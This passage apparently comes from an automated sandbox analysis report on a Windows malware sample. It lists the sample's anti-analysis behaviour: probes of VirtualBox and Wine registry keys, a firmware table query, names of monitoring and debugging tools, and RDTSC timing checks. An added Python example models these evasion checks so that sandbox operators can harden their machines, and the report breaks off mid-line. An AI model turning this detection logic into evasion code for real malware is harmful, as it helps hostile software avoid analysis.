Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical entry repeated 74 times in the report)
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical entry repeated 69 times in the report)
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Process information set: NOOPENFILEERRORBOX (identical entry repeated 17 times in the report)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: PROCMON.EXE
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: X64DBG.EXE
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXEV
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WINDBG.EXE
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: WIRESHARK.EXE
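Taken together, the entries in this section describe a layered environment check: the processor count is read from the PEB before the sample either sleeps or calls ExitProcess, the firmware table is queried, the Wine and VirtualBox ACPI registry keys are opened, FindWindow is called for the Procmon/Regmon/Filemon window classes, and a string table of debugger and monitoring tool names is carried in memory. The Python below is an added example (not code from the report or from the sample) that models that decision logic over a hand-built host snapshot, so a sandbox operator can test which artifacts still give the environment away. The registry keys, window classes, process names and the VBOX*.DLL pattern are taken from the report lines above; the processor threshold of 2 and the hypervisor vendor strings matched in the SMBIOS table are assumptions, because the report shows only that the PEB and the firmware table were read, not what was compared.

```python
import fnmatch
from dataclasses import dataclass, field

# Artifacts this report shows the sample probing. Registry keys and window classes come from the
# behaviour lines; process and file names come from the string table recovered from b7c03317c9.exe memory.
VM_REGISTRY_KEYS = {
    r"HKEY_CURRENT_USER\Software\Wine",
    r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__",
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VBoxSF",
}
MONITOR_WINDOW_CLASSES = {"PROCMON_WINDOW_CLASS", "REGMONCLASS", "FILEMONCLASS"}
ANALYST_PROCESSES = {"PROCMON.EXE", "X64DBG.EXE", "WINDBG.EXE", "WIRESHARK.EXE", "IDA.EXE", "SYSANALYZER.EXE"}
SYSTEM32_PATTERNS = ("VBOX*.DLL",)
# Assumption: the report only shows that the firmware table was queried, not which strings are
# matched; these are the usual hypervisor vendor markers found in SMBIOS tables.
FIRMWARE_MARKERS = (b"virtualbox", b"innotek", b"vmware", b"qemu", b"xen", b"parallels")
MIN_PROCESSORS = 2  # assumption: the report says the PEB is read, the exact threshold is not shown


@dataclass
class HostSnapshot:
    """What the checks would observe on a host; filled in by hand so the logic runs offline."""
    processor_count: int                               # PEB.NumberOfProcessors
    smbios_raw: bytes                                  # raw SMBIOS table as returned by a firmware table query
    registry_keys: set = field(default_factory=set)    # keys that open successfully
    window_classes: set = field(default_factory=set)   # top-level window classes visible to FindWindow
    process_names: set = field(default_factory=set)    # running image names
    system32_files: set = field(default_factory=set)   # file names present in C:\Windows\System32


def evasion_reasons(host):
    """Return the checks that would tell the sample it is being analysed; an empty list means it runs."""
    reasons = []
    if host.processor_count < MIN_PROCESSORS:
        reasons.append("peb_processor_count")
    if any(marker in host.smbios_raw.lower() for marker in FIRMWARE_MARKERS):
        reasons.append("firmware_table_vendor_string")
    opened = {k.lower() for k in host.registry_keys}
    if any(k.lower() in opened for k in VM_REGISTRY_KEYS):
        reasons.append("vm_registry_key")
    # Window class names are matched case-insensitively; the report shows the sample trying
    # both "RegmonClass" and "Regmonclass" anyway.
    if {w.upper() for w in host.window_classes} & MONITOR_WINDOW_CLASSES:
        reasons.append("monitor_window_class")
    if {p.upper() for p in host.process_names} & ANALYST_PROCESSES:
        reasons.append("analysis_tool_process")
    if any(fnmatch.fnmatch(f.upper(), pat) for f in host.system32_files for pat in SYSTEM32_PATTERNS):
        reasons.append("vbox_guest_additions_dll")
    return reasons


def build_smbios(manufacturer, product):
    """Constructed, minimal raw SMBIOS blob: 8-byte RawSMBIOSData header, one Type 1 record, its strings."""
    strings = manufacturer.encode() + b"\x00" + product.encode() + b"\x00\x00"
    # type 1, length 27, handle 1, manufacturer = string #1, product = string #2, remaining fields zeroed
    type1 = bytes([1, 0x1B, 1, 0, 1, 2]) + bytes(21)
    table = type1 + strings
    header = bytes([0, 3, 2, 0]) + len(table).to_bytes(4, "little")  # calling method, major, minor, revision, length
    return header + table


# Constructed snapshots: a stock VirtualBox sandbox with Procmon running, and the same box after hardening.
STOCK_SANDBOX = HostSnapshot(
    processor_count=1,
    smbios_raw=build_smbios("innotek GmbH", "VirtualBox"),
    registry_keys={r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__"},
    window_classes={"Procmon_Window_Class"},
    process_names={"procmon.exe", "explorer.exe"},
    system32_files={"VBoxMRXNP.dll", "kernel32.dll"},
)
HARDENED_SANDBOX = HostSnapshot(
    processor_count=4,
    smbios_raw=build_smbios("Dell Inc.", "Latitude 5540"),
    process_names={"explorer.exe"},
    system32_files={"kernel32.dll"},
)

if __name__ == "__main__":
    print("stock   :", evasion_reasons(STOCK_SANDBOX))
    print("hardened:", evasion_reasons(HARDENED_SANDBOX))
```

Every reason returned for a snapshot is one artifact the analysis VM still exposes; the list is ordered the way the report's signatures appear, and the VBoxSF service key is included because it sits in the same in-memory string table as the tool names even though the report's behaviour lines do not show it being opened.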
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD78EF second address: CD78F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD78F5 second address: CD7902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5E8080F356h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7902 second address: CD7906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7906 second address: CD7923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5E8080F35Eh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7923 second address: CD7929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6A6D second address: CC6A72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC6A72 second address: CC6A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5E810FCBA6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CDE second address: CD6CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CE2 second address: CD6CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E810FCBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6CEE second address: CD6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007F5E8080F356h 0x0000000b jmp 00007F5E8080F35Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jnp 00007F5E8080F356h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6D13 second address: CD6D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6ED2 second address: CD6ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAC97 second address: CDAC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAC9F second address: CDACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDACA5 second address: CDACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E810FCBB8h 0x0000000d pushad 0x0000000e js 00007F5E810FCBA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDACCE second address: CDAD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1CD0h], esi 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D200Ch] 0x00000015 mov ch, dh 0x00000017 push C92914E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F5E8080F361h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAEC6 second address: CDAECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAECB second address: CDAED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAED1 second address: CDAF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0F974DB7h 0x0000000f or dx, A403h 0x00000014 push 00000003h 0x00000016 and si, 19F1h 0x0000001b push 00000000h 0x0000001d call 00007F5E810FCBB5h 0x00000022 mov dx, si 0x00000025 pop edx 0x00000026 push eax 0x00000027 mov dword ptr [ebp+122D297Bh], esi 0x0000002d pop edi 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D3AA2h], ebx 0x00000036 push 87B75848h 0x0000003b jo 00007F5E810FCBB4h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAF25 second address: CDAF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDAF2B second address: CDAF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 3848A7B8h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5E810FCBA8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movzx ecx, cx 0x00000029 lea ebx, dword ptr [ebp+1244FB97h] 0x0000002f mov dword ptr [ebp+122D2B84h], ecx 0x00000035 mov ch, F2h 0x00000037 xchg eax, ebx 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5E810FCBABh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB097 second address: CDB0A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0A7 second address: CDB0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0AC second address: CDB0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007F5E8080F364h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5E8080F356h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0CF second address: CDB0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d jnc 00007F5E810FCBACh 0x00000013 js 00007F5E810FCBA6h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F5E810FCBAAh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB0FC second address: CDB101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB101 second address: CDB106 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB106 second address: CDB12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jnp 00007F5E8080F356h 0x0000000e lea ebx, dword ptr [ebp+1244FBA2h] 0x00000014 add dword ptr [ebp+122D2B74h], esi 0x0000001a push eax 0x0000001b jnc 00007F5E8080F35Eh 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDC9 second address: CECDE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F5E810FCBA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F5E810FCBA6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDE0 second address: CECDE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECDE4 second address: CECDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC34B6 second address: CC34BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA2F0 second address: CFA2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA4A4 second address: CFA4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA8F2 second address: CFA908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5E810FCBAFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFA908 second address: CFA918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5E8080F356h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFAA3C second address: CFAA48 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E810FCBA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF659 second address: CFF676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F369h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF794 second address: CFF798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF798 second address: CFF7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF7A2 second address: CFF7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F5E810FCBA8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0572F second address: D05749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DCB second address: D05DD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DD5 second address: D05DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05DD9 second address: D05DDF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F44 second address: D05F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F63 second address: D05F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F69 second address: D05F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5E8080F35Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D05F79 second address: D05F96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E810FCBB8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D089D4 second address: D089E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D089E6 second address: D089EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0967A second address: D0968A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0968A second address: D09690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09728 second address: D0972C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0972C second address: D09730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09730 second address: D09736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09736 second address: D0974E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F5E810FCBA6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0974E second address: D09752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09752 second address: D09756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D09BDF second address: D09C0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F5E8080F369h 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 je 00007F5E8080F356h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0A0BE second address: D0A161 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F5E810FCBB8h 0x00000011 nop 0x00000012 sub esi, 0084BF8Fh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F5E810FCBA8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 pushad 0x00000035 mov bl, FCh 0x00000037 popad 0x00000038 jnl 00007F5E810FCBACh 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007F5E810FCBA8h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a call 